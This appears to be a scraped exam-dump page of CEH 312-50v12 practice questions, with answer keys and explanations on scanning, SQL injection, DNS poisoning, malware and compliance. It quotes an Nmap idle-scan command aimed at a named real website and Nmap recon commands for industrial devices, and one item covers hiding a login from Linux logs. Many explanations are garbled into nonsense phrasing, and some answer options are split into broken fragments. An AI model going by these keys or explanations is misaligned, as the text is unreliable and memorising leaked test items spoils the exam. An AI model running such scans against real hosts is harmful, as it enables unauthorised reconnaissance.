kiosk.adobe.com www.riaa.com. kiosk.adobe.com is the host with incremental IP ID sequence. What is the purpose of using "-si" with Nmap?

A. Conduct stealth scan
B. Conduct ICMP scan
C. Conduct IDLE scan
D. Conduct silent scan

Answer: C

Explanation: 
Once a suitable zombie has been found, performing a scan is easy. Simply specify the zombie hostname to the -sI option and Nmap does the rest. Example 5.19
shows an example of Ereet scanning the Recording Industry Association of America by bouncing an idle scan off an Adobe machine named Kiosk.
Example 5.19. An idle scan against the RIAA
# nmap -Pn -p- -sI kiosk.adobe.com www.riaa.com
Starting Nmap ( http://nmap.org )
Idlescan using zombie kiosk.adobe.com (192.150.13.111:80); Class: Incremental Nmap scan report for 208.225.90.120
(The 65522 ports scanned but not shown below are in state: closed)
Port-State-Service
21/tcpopenftp
25/tcpopensmtp
80/tcpopenhttp
111/tcpopensunrpc
135/tcpopenloc-srv
443/tcpopenhttps
1027/tcpopenIIS
1030/tcpopeniad1
2306/tcpopenunknown
5631/tcpopenpcanywheredata
7937/tcpopenunknown
7938/tcpopenunknown
36890/tcpopenunknown
Nmap done: 1 IP address (1 host up) scanned in 2594.47 seconds
https://nmap.org/book/idlescan.html 

NEW QUESTION 248
- (Exam Topic 2)
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may Bypass authentication and allow attackers to access and/or modify data
attached to a web application.
Which of the following SQLI types leverages a database server's ability to make DNS requests to pass data to an attacker?

A. Union-based SQLI
B. Out-of-band SQLI
C. ln-band SQLI
D. Time-based blind SQLI

Answer: B

Explanation: 
Out-of-band SQL injection occurs when an attacker is unable to use an equivalent channel to launch the attack and gather results. … Out-of-band SQLi techniques
would believe the database server’s ability to form DNS or HTTP requests to deliver data to an attacker. Out-of-band SQL injection is not very common, mostly
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because it depends on features being enabled on the database server being used by the web application.
Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.
Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an
inferential time-based attack unreliable).
Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with
Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Database’s
UTL_HTTP
package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.

NEW QUESTION 250
- (Exam Topic 2)
Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients are complaining that their personal medical
records are fully exposed on the Internet and someone can find them with a simple Google search. Bob's boss is very worried because of regulations that protect
those data. Which of the following regulations is mostly violated?

A. HIPPA/PHl
B. Pll
C. PCIDSS
D. ISO 2002

Answer: A

Explanation: 
PHI stands for Protected Health info. The HIPAA Privacy Rule provides federal protections for private health info held by lined entities and provides patients an
array of rights with regard to that info. under HIPAA phi is considered to be any identifiable health info that’s used, maintained, stored, or transmitted by a HIPAA-
covered entity – a healthcare provider, health plan or health insurer, or a aid clearinghouse – or a business associate of a HIPAA-covered entity, in relation to the
availability of aid or payment for aid services.
It is not only past and current medical info that’s considered letter under HIPAA Rules, however also future info concerning medical conditions or physical and
mental health related to the provision of care or payment for care. phi is health info in any kind, together with physical records, electronic records, or spoken info.
Therefore, letter includes health records, medical histories, lab check results, and medical bills. basically, all health info is considered letter once it includes
individual identifiers. Demographic info is additionally thought of phi underneath HIPAA Rules, as square measure several common identifiers like patient names,
Social Security numbers, Driver’s license numbers, insurance details, and birth dates, once they square measure connected with health info.
The eighteen identifiers that create health info letter are:

 Names

 Dates, except year

 phonephone numbers

 Geographic information

 FAX numbers

 Social Security numbers

 Email addresses

 case history numbers

 Account numbers

 Health arrange beneficiary numbers

 Certificate/license numbers

 Vehicle identifiers and serial numbers together with license plates

 Web URLs

 Device identifiers and serial numbers

 net protocol addresses

 Full face photos and comparable pictures

 Biometric identifiers (i.e. retinal scan, fingerprints)

 Any distinctive identifying variety or code
One or a lot of of those identifiers turns health info into letter, and phi HIPAA Privacy Rule restrictions can then apply that limit uses and disclosures of the data.
HIPAA lined entities and their business associates will ought to guarantee applicable technical, physical, and body safeguards are enforced to make sure the
confidentiality, integrity, and availability of phi as stipulated within the HIPAA Security Rule.

NEW QUESTION 253
- (Exam Topic 2)
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?

A. The attacker queries a nameserver using the DNS resolver.
B. The attacker makes a request to the DNS resolver.
C. The attacker forges a reply from the DNS resolver.
D. The attacker uses TCP to poison the ONS resofver.

Answer: B

Explanation: 
https://ru.wikipedia.org/wiki/DNS_spoofing
DNS spoofing is a threat that copies the legitimate server destinations to divert the domain's traffic. Ignorant these attacks, the users are redirected to malicious
websites, which results in insensitive and personal data
being leaked. It is a method of attack where your DNS server is tricked into saving a fake DNS entry. This will make the DNS server recall a fake site for you,
thereby posing a threat to vital information stored on your server or computer.
The cache poisoning codes are often found in URLs sent through spam emails. These emails are sent to prompt users to click on the URL, which infects their
computer. When the computer is poisoned, it will divert you to a fake IP address that looks like a real thing. This way, the threats are injected into your systems as
well.
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Different Stages of Attack of DNS Cache Poisoning:
- The attacker proceeds to send DNS queries to the DNS resolver, which forwards the Root/TLD authoritative DNS server request and awaits an answer.
- The attacker overloads the DNS with poisoned responses that contain several IP addresses of the malicious website. To be accepted by the DNS resolver, the
attacker's response should match a port number and the query ID field before the DNS response. Also, the attackers can force its response to increasing their
chance of success.
- If you are a legitimate user who queries this DNS resolver, you will get a poisoned response from the cache, and you will be automatically redirected to the
malicious website.

NEW QUESTION 258
- (Exam Topic 2)
Consider the following Nmap output:

what command-line parameter could you use to determine the type and version number of the web server?

A. -sv
B. -Pn
C. -V
D. -ss

Answer: A

Explanation: 
C:\Users\moi>nmap -h | findstr " -sV" -sV: Probe open ports to determine service/version info

NEW QUESTION 260
- (Exam Topic 2)
How can you determine if an LM hash you extracted contains a password that is less than 8 characters long?

A. There is no way to tell because a hash cannot be reversed
B. The right most portion of the hash is always the same
C. The hash always starts with AB923D
D. The left most portion of the hash is always the same
E. A portion of the hash will be all 0's

Answer: B

NEW QUESTION 263
- (Exam Topic 2)
When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize
acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the "TCP
three-way handshake." While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to
be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK.
How would an attacker exploit this design by launching TCP SYN attack?

A. Attacker generates TCP SYN packets with random destination addresses towards a victim host
B. Attacker floods TCP SYN packets with random source addresses towards a victim host
C. Attacker generates TCP ACK packets with random source addresses towards a victim host
D. Attacker generates TCP RST packets with random source addresses towards a victim host

Answer: B

NEW QUESTION 267
- (Exam Topic 2)
what firewall evasion scanning technique make use of a zombie system that has low network activity as well as its fragment identification numbers?

A. Decoy scanning
B. Packet fragmentation scanning
C. Spoof source address scanning
D. Idle scanning

Answer: D
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Explanation: 
The idle scan could be a communications protocol port scan technique that consists of causing spoofed packets to a pc to seek out out what services square
measure obtainable. this can be accomplished by impersonating another pc whose network traffic is extremely slow or nonexistent (that is, not transmission or
receiving information). this might be associate idle pc, known as a “zombie”.
This action are often done through common code network utilities like nmap and hping. The attack involves causing solid packets to a particular machine target in
an attempt to seek out distinct characteristics of another zombie machine. The attack is refined as a result of there’s no interaction between the offender pc and
also the target: the offender interacts solely with the “zombie” pc.
This exploit functions with 2 functions, as a port scanner and a clerk of sure informatics relationships between machines. The target system interacts with the
“zombie” pc and distinction in behavior are often discovered mistreatment totally different|completely different “zombies” with proof of various privileges granted
by the target to different computers.
The overall intention behind the idle scan is to “check the port standing whereas remaining utterly invisible to the targeted host.”
The first step in execution associate idle scan is to seek out associate applicable zombie. It must assign informatics ID packets incrementally on a worldwide
(rather than per-host it communicates with) basis. It ought to be idle (hence the scan name), as extraneous traffic can raise its informatics ID sequence, confusing
the scan logic. The lower the latency between the offender and also the zombie, and between the zombie and also the target, the quicker the scan can proceed.
Note that once a port is open, IPIDs increment by a pair of. Following is that the sequence:

 offender to focus on -> SYN, target to zombie ->SYN/ACK, Zombie to focus on -> RST (IPID increment by 1)

 currently offender tries to probe zombie for result. offender to Zombie ->SYN/ACK, Zombie to offender
-> RST (IPID increment by 1)
So, during this method IPID increments by a pair of finally.
When associate idle scan is tried, tools (for example nmap) tests the projected zombie and reports any issues with it. If one does not work, attempt another.
Enough net hosts square measure vulnerable that zombie candidates are not exhausting to seek out. a standard approach is to easily execute a ping sweep of
some network. selecting a network close to your supply address, or close to the target, produces higher results. you’ll be able to attempt associate idle scan
mistreatment every obtainable host from the ping sweep results till you discover one that works. As usual, it’s best to raise permission before mistreatment
someone’s machines for surprising functions like idle scanning.
Simple network devices typically create nice zombies as a result of {they square measure|they’re} normally each underused (idle) and designed with
straightforward network stacks that are susceptible to informatics ID traffic detection.
While distinguishing an acceptable zombie takes some initial work, you’ll be able to keep re-using the nice ones. as an alternative, there are some analysis on
utilizing unplanned public internet services as zombie hosts to perform similar idle scans. leverage the approach a number of these services perform departing
connections upon user submissions will function some quite poor’s man idle scanning.

NEW QUESTION 272
- (Exam Topic 2)
What is the algorithm used by LM for Windows2000 SAM?

A. MD4
B. DES
C. SHA
D. SSL

Answer: B

NEW QUESTION 277
- (Exam Topic 2)
Matthew, a black hat, has managed to open a meterpreter session to one of the kiosk machines in Evil Corp’s lobby. He checks his current SID, which is
S-1-5-21-1223352397-1872883824-861252104-501. What needs to happen before Matthew has full administrator access?

A. He must perform privilege escalation.
B. He needs to disable antivirus protection.
C. He needs to gain physical access.
D. He already has admin privileges, as shown by the “501” at the end of the SID.

Answer: A

NEW QUESTION 278
- (Exam Topic 2)
Jim, a professional hacker, targeted an organization that is operating critical Industrial Infrastructure. Jim used Nmap to scan open pons and running services on
systems connected to the organization's OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered
Information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the
required information?

A. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >
B. nmap -Pn -sU -p 44818 --script enip-info < Target IP >
C. nmap -Pn -sT -p 46824 < Target IP >
D. nmap -Pn -sT -p 102 --script s7-info < Target IP >

Answer: B

Explanation: 
 https://nmap.org/nsedoc/scripts/enip-info.html Example Usage enip-info:
- nmap --script enip-info -sU -p 44818 <host>
This NSE script is used to send a EtherNet/IP packet to a remote device that has TCP 44818 open. The script will send a Request Identity Packet and once a
response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. Information that is parsed includes
Device Type, Vendor ID, Product name, Serial Number, Product code, Revision Number, status, state, as well as the Device IP.
This script was written based of information collected by using the the Wireshark dissector for CIP, and EtherNet/IP, The original information was collected by
running a modified version of the ethernetip.py script (https://github.com/paperwork/pyenip)

NEW QUESTION 280
- (Exam Topic 2)
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You have successfully logged on a Linux system. You want to now cover your trade Your login attempt may be logged on several files located in /var/log. Which
file does NOT belongs to the list:

A. user.log
B. auth.fesg
C. wtmp
D. btmp

Answer: C

NEW QUESTION 281
- (Exam Topic 2)
Which of the following DoS tools is used to attack target web applications by starvation of available sessions on the web server?
The tool keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value.

A. My Doom
B. Astacheldraht
C. R-U-Dead-Yet?(RUDY)
D. LOIC

Answer: C

NEW QUESTION 286
- (Exam Topic 2)
You need a tool that can do network intrusion prevention and intrusion detection, function as a network sniffer, and record network activity, what tool would you
most likely select?

A. Nmap
B. Cain & Abel
C. Nessus
D. Snort

Answer: D

NEW QUESTION 287
- (Exam Topic 2)
What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?

A. Copy the system files from a known good system
B. Perform a trap and trace
C. Delete the files and try to determine the source
D. Reload from a previous backup
E. Reload from known good media

Answer: E

NEW QUESTION 290
- (Exam Topic 2)
What would be the fastest way to perform content enumeration on a given web server by using the Gobuster tool?

A. Performing content enumeration using the bruteforce mode and 10 threads
B. Shipping SSL certificate verification
C. Performing content enumeration using a wordlist
D. Performing content enumeration using the bruteforce mode and random file extensions

Answer: A

NEW QUESTION 294
- (Exam Topic 2)
The Payment Card Industry Data Security Standard (PCI DSS) contains six different categories of control objectives. Each objective contains one or more
requirements, which must be followed in order to achieve compliance. Which of the following requirements would best fit under the objective, "Implement strong
access control measures"?

A. Regularly test security systems and processes.
B. Encrypt transmission of cardholder data across open, public networks.
C. Assign a unique ID to each person with computer access.
D. Use and regularly update anti-virus software on all systems commonly affected by malware.

Answer: C

NEW QUESTION 295
- (Exam Topic 2)
________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes.

A. Trojan
B. RootKit
C. DoS tool

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com



Welcome to download the Newest 2passeasy 312-50v12 dumps
https://www.2passeasy.com/dumps/312-50v12/ (503 New Questions)

D. Scanner
E. Backdoor

Answer: B

NEW QUESTION 296
- (Exam Topic 2)
Within the context of Computer Security, which of the following statements describes Social Engineering best?

A. Social Engineering is the act of publicly disclosing information
B. Social Engineering is the means put in place by human resource to perform time accounting
C. Social Engineering is the act of getting needed information from a person rather than breaking into a system
D. Social Engineering is a training program within sociology studies

Answer: C

NEW QUESTION 301
- (Exam Topic 2)
jane, an ethical hacker. Is testing a target organization's web server and website to identity security loopholes. In this process, she copied the entire website and its
content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information
helps jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario?

A. website mirroring
B. Session hijacking
C. Web cache poisoning
D. Website defacement

Answer: A

Explanation: 
A mirror site may be a website or set of files on a computer server that has been copied to a different computer server in order that the location or files are
available from quite one place. A mirror site has its own URL, but is otherwise just like the principal site. Load-balancing devices allow high-volume sites to scale
easily, dividing the work between multiple mirror sites.A mirror site is typically updated frequently to make sure it reflects the contents of the first site. In some
cases, the first site may arrange for a mirror site at a bigger location with a better speed connection and, perhaps, a better proximity to an outsized audience.If the
first site generates an excessive amount of traffic, a mirror site can ensure better availability of the web site or files. For websites that provide copies or updates of
widely used software, a mirror site allows the location to handle larger demands and enables the downloaded files to arrive more quickly. Microsoft, Sun
Microsystems and other companies have mirror sites from which their browser software are often downloaded.Mirror sites are wont to make site access faster
when the first site could also be geographically distant from those accessing it. A mirrored web server is usually located on a special continent from the principal
site, allowing users on the brink of the mirror site to urge faster and more reliable access.Mirroring an internet site also can be done to
make sure that information are often made available to places where access could also be unreliable or censored. In 2013, when Chinese authorities blocked
access to foreign media outlets just like the Wall Street Journal and Reuters, site mirroring was wont to restore access and circumvent government censorship.

NEW QUESTION 306
- (Exam Topic 1)
If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and
the network may be using TCP. Which other option could the tester use to get a response from a host using TCP?

A. Traceroute
B. Hping
C. TCP ping
D. Broadcast ping

Answer: B

Explanation: 
https://tools.kali.org/information-gathering/hping3
http://www.carnal0wnage.com/papers/LSO-Hping2-Basics.pdf

NEW QUESTION 311
- (Exam Topic 1)
Which system consists of a publicly available set of databases that contain domain name registration contact information?

A. WHOIS
B. CAPTCHA
C. IANA
D. IETF

Answer: A

NEW QUESTION 314
- (Exam Topic 1)
Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool
to enumerate Alice machine. From the command prompt, she types the following command.

What is Eve trying to do?
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A. Eve is trying to connect as a user with Administrator privileges
B. Eve is trying to enumerate all users with Administrative privileges
C. Eve is trying to carry out a password crack for user Administrator
D. Eve is trying to escalate privilege of the null user to that of Administrator

Answer: C

NEW QUESTION 316
- (Exam Topic 1)
Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall to allow access just to servers/ports,
which can have direct internet access, and block the access to workstations.
Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA.
In this context, what can you say?

A. Bob can be right since DMZ does not make sense when combined with stateless firewalls
B. Bob is partially righ
C. He does not need to separate networks if he can create rules by destination IPs, one by one
D. Bob is totally wron
E. DMZ is always relevant when the company has internet servers and workstations
F. Bob is partially righ
G. DMZ does not make sense when a stateless firewall is available

Answer: C

NEW QUESTION 320
- (Exam Topic 1)
One of your team members has asked you to analyze the following SOA record.
What is the TTL? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.)

A. 200303028
B. 3600
C. 604800
D. 2400
E. 60
F. 4800

Answer: D

NEW QUESTION 321
- (Exam Topic 1)
Which of the following program infects the system boot sector and the executable files at the same time?

A. Polymorphic virus
B. Stealth virus
C. Multipartite Virus
D. Macro virus

Answer: C

NEW QUESTION 323
- (Exam Topic 1)
Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on walking patterns and implemented
this approach to a physical control access.
A camera captures people walking and identifies the individuals using Steve’s approach.
After that, people must approximate their RFID badges. Both the identifications are required to open the door. In this case, we can say:

A. Although the approach has two phases, it actually implements just one authentication factor
B. The solution implements the two authentication factors: physical object and physical characteristic
C. The solution will have a high level of false positives
D. Biological motion cannot be used to identify people

Answer: B

NEW QUESTION 327
- (Exam Topic 1)
PGP, SSL, and IKE are all examples of which type of cryptography?

A. Digest
B. Secret Key
C. Public Key
D. Hash Algorithm

Answer: C

NEW QUESTION 330
- (Exam Topic 1)
Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being
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run?

A. Macro virus
B. Stealth/Tunneling virus
C. Cavity virus
D. Polymorphic virus

Answer: B

NEW QUESTION 334
- (Exam Topic 1)
Peter is surfing the internet looking for information about DX Company. Which hacking process is Peter doing?

A. Scanning
B. Footprinting
C. Enumeration
D. System Hacking

Answer: B

NEW QUESTION 336
- (Exam Topic 1)
What is the proper response for a NULL scan if the port is open?

A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response

Answer: F

NEW QUESTION 337
- (Exam Topic 1)
A new wireless client is configured to join a 802.11 network. This client uses the same hardware and software as many of the other clients on the network. The
client can see the network, but cannot connect. A wireless packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association
requests being sent by the wireless client. What is a possible source of this problem?

A. The WAP does not recognize the client’s MAC address
B. The client cannot see the SSID of the wireless network
C. Client is configured for the wrong channel
D. The wireless client is not configured to use DHCP

Answer: A

Explanation: 
https://en.wikipedia.org/wiki/MAC_filtering
MAC filtering is a security method based on access control. Each address is assigned a 48-bit address, which is used to determine whether we can access a
network or not. It helps in listing a set of allowed devices that you need on your Wi-Fi and the list of denied devices that you don’t want on your Wi-Fi. It helps in
preventing unwanted access to the network. In a way, we can blacklist or white list certain computers based on their MAC address. We can configure the filter to
allow connection only to those devices included in the white list. White lists provide greater security than blacklists because the router grants access only to
selected devices.
It is used on enterprise wireless networks having multiple access points to prevent clients from communicating with each other. The access point can be
configured only to allow clients to talk to the default gateway, but not other wireless clients. It increases the efficiency of access to a network.
The router allows configuring a list of allowed MAC addresses in its web interface, allowing you to choose which devices can connect to your network. The router
has several functions designed to improve the network's security, but not all are useful. Media access control may seem advantageous, but there are certain flaws.
On a wireless network, the device with the proper credentials such as SSID and password can authenticate with the router and join the network, which gets an IP
address and access to the internet and any shared resources.
MAC address filtering adds an extra layer of security that checks the device’s MAC address against a list of agreed addresses. If the client’s address matches
one on the router’s list, access is granted; otherwise, it doesn’t join the network.

NEW QUESTION 340
......
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